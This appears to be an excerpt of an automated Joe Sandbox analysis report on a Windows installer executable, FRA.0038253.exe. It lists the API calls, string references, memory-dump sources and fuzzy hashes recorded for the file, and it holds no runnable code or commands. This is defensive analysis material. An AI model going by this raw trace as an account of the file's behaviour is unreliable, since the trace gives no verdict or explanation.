                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,spidsmus,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$spidsmus
                                                                          • API String ID: 941294808-2148335437
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
                                                                          • GetShortPathNameA.KERNEL32(?,004226B0,00000400), ref: 00405EFA
                                                                            • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                            • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                          • GetShortPathNameA.KERNEL32(?,00422AB0,00000400), ref: 00405F17
                                                                          • wsprintfA.USER32 ref: 00405F35
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00422AB0,C0000000,00000004,00422AB0,?,?,?,?,?), ref: 00405F70
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                                          • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004222B0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
                                                                            • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405DEE
                                                                            • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405E10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                          • String ID: %s=%s$[Rename]
                                                                          • API String ID: 2171350718-1727408572
                                                                          APIs
                                                                          • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065A9
                                                                          • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065B6
                                                                          • CharNextA.USER32(0000000C,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065BB
                                                                          • CharPrevA.USER32(0000000C,0000000C,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065CB
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\FRA.0038253.exe", xrefs: 00406551
                                                                          • *?|<>/":, xrefs: 00406599
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406552
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-3334743949
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 0040437B
                                                                          • GetSysColor.USER32(00000000), ref: 004043B9
                                                                          • SetTextColor.GDI32(?,00000000), ref: 004043C5
                                                                          • SetBkMode.GDI32(?,?), ref: 004043D1
                                                                          • GetSysColor.USER32(?), ref: 004043E4
                                                                          • SetBkColor.GDI32(?,?), ref: 004043F4
                                                                          • DeleteObject.GDI32(?), ref: 0040440E
                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404418
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          APIs
                                                                            • Part of subcall function 707512A5: GlobalAlloc.KERNEL32(00000040,707512C3,?,7075135F,-7075504B,707511C0,-000000A0), ref: 707512AD
                                                                          • GlobalFree.KERNEL32(?), ref: 7075266E
                                                                          • GlobalFree.KERNEL32(00000000), ref: 707526A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C65
                                                                          • GetMessagePos.USER32 ref: 00404C6D
                                                                          • ScreenToClient.USER32(?,?), ref: 00404C87
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C99
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CBF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401E5D
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                                                          • CreateFontIndirectA.GDI32(0040B800), ref: 00401EDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Tahoma
                                                                          • API String ID: 3808545654-3580928618
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                                                          • MulDiv.KERNEL32(0008E0A5,00000064,?), ref: 00402E90
                                                                          • wsprintfA.USER32 ref: 00402EA0
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402E9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 707524D7
                                                                            • Part of subcall function 707512B4: lstrcpynA.KERNEL32(00000000,?,7075135F,-7075504B,707511C0,-000000A0), ref: 707512C4
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 70752452
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 70752467
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 70752478
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 70752486
                                                                          • GlobalFree.KERNEL32(00000000), ref: 7075248D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                          • String ID:
                                                                          • API String ID: 3730416702-0
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                                                          • GlobalFree.KERNEL32(?), ref: 004028C9
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                          • String ID:
                                                                          • API String ID: 2667972263-0
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(spidsmus: Installing,spidsmus: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A5B,000000DF,00000000,00000400,?), ref: 00404BDE
                                                                          • wsprintfA.USER32 ref: 00404BE6
                                                                          • SetDlgItemTextA.USER32(?,spidsmus: Installing), ref: 00404BF9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s$spidsmus: Installing
                                                                          • API String ID: 3540041739-1409120186
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,?), ref: 00401DA3
                                                                          • GetClientRect.USER32(?,?), ref: 00401DF1
                                                                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                                                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                                                          • DeleteObject.GDI32(00000000), ref: 00401E45
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040338F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 00405BEF
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040338F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 00405BF8
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C09
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                                                          • GetTickCount.KERNEL32 ref: 00402EFE
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                                                          • ShowWindow.USER32(00000000,00000005,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0040533E
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 0040538F
                                                                            • Part of subcall function 00404343: SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 00404355
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,00403545,spidsmus,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406264
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(?,?,00421D28,0000000C,00405CEE,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405C90
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                          • lstrlenA.KERNEL32(00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405D2A
                                                                          • GetFileAttributesA.KERNEL32(00421D28,00421D28,00421D28,00421D28,00421D28,00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\), ref: 00405D3A
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,77673410,00000000,C:\Users\user\AppData\Local\Temp\,004039A3,00403789,?,?,00000008,0000000A,0000000C), ref: 004039E5
                                                                          • GlobalFree.KERNEL32(?), ref: 004039EC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004039CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FRA.0038253.exe,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A), ref: 00405C36
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FRA.0038253.exe,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?), ref: 00405C44
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 7075116B
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 707511D8
                                                                          • GlobalFree.KERNEL32(?), ref: 70751286
                                                                          • GlobalFree.KERNEL32(00000000), ref: 7075129B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID:
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D77
                                                                          • CharNextA.USER32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D88
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:

                                                                          Execution Graph

                                                                          Execution Coverage:0%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:100%
                                                                          Total number of Nodes:1
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 43381 35722b90 LdrInitializeThunk

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2 357234e0-357234ec LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 19a3d3982eb6d7a5057a652e025d6ab8b8bdbe8d4a15ed4f4cdd9c4033abce7b
                                                                          • Instruction ID: 97ca2f03658ad9921be1548eddbb1e9ad32cd4feded21586a6d0118b026a1861
                                                                          • Opcode Fuzzy Hash: 19a3d3982eb6d7a5057a652e025d6ab8b8bdbe8d4a15ed4f4cdd9c4033abce7b
                                                                          • Instruction Fuzzy Hash: 9190027161710402D50061594615746101547E0211FA1C956A0414928EC7B5895575E2

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1 35722d10-35722d1c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: de17877b9e5c1cd9d61cb23131fb9cc21cbb40e8c8f4ea4ea44af55e1a8e1247
                                                                          • Instruction ID: cb5b33f0f97a0f5e9bc87ab74e1e1aa9196cbec5707a9971e9a8c79761e24a41
                                                                          • Opcode Fuzzy Hash: de17877b9e5c1cd9d61cb23131fb9cc21cbb40e8c8f4ea4ea44af55e1a8e1247
                                                                          • Instruction Fuzzy Hash: BF90027121300413D51161594605747001947E0251FD1C957A0414918ED6768956B161

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 35722b90-35722b9c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 21b00ed5866bd065554eb9f35aab7ac5ed03d7cc6bbcb9bc1eae59cd0327000b
                                                                          • Instruction ID: a1d135a176fd2ecccdd4f35000d98408ce3d6394dc4cc49169576577960a47b5
                                                                          • Opcode Fuzzy Hash: 21b00ed5866bd065554eb9f35aab7ac5ed03d7cc6bbcb9bc1eae59cd0327000b
                                                                          • Instruction Fuzzy Hash: 4C90027121308802D5106159850578A001547E0311F95C956A4414A18EC6B588957161

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $ $0
                                                                          • API String ID: 3446177414-3352262554
                                                                          • Opcode ID: ec41ab6155b4fe1b4d437f98f27f0142b95779321ef7e0a2ac153537358423b5
                                                                          • Instruction ID: f62544094da32339864f32081a376533f3d157fbc78f703ba9392061cb08d039
                                                                          • Opcode Fuzzy Hash: ec41ab6155b4fe1b4d437f98f27f0142b95779321ef7e0a2ac153537358423b5
                                                                          • Instruction Fuzzy Hash: E53203B1A083818FE350CF68C885B5BBBF5BF88344F04492EF5998B251D775E949CB52
                                                                          Strings
                                                                          • LanguageConfiguration, xrefs: 35785FA0
                                                                          • @, xrefs: 35785DF7
                                                                          • PreferredUILanguagesPending, xrefs: 35785D52
                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 35785604
                                                                          • PreferredUILanguages, xrefs: 35785F51
                                                                          • InstallLanguageFallback, xrefs: 35785BD0
                                                                          • @, xrefs: 35785D30
                                                                          • Control Panel\Desktop, xrefs: 35785CDE
                                                                          • @, xrefs: 35785BA7
                                                                          • @, xrefs: 35785FFA
                                                                          • @, xrefs: 35785F20
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 35785EDD
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 35785B61
                                                                          • LanguageConfigurationPending, xrefs: 35785DA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                          • API String ID: 0-1325123933
                                                                          • Opcode ID: 7d4dfd1181b5d7f8bf8f436c61b771d9919df43d782683ac14993a4aa45e471e
                                                                          • Instruction ID: 17d53e956a7011a0f80c852af1e8ad1acf575a9c48ad8b273b739b31baa53afb
                                                                          • Opcode Fuzzy Hash: 7d4dfd1181b5d7f8bf8f436c61b771d9919df43d782683ac14993a4aa45e471e
                                                                          • Instruction Fuzzy Hash: 17725BB5608341AFD321CF25C845B6BB7EAFB88794F40492DF999DB250EB70D805CB92

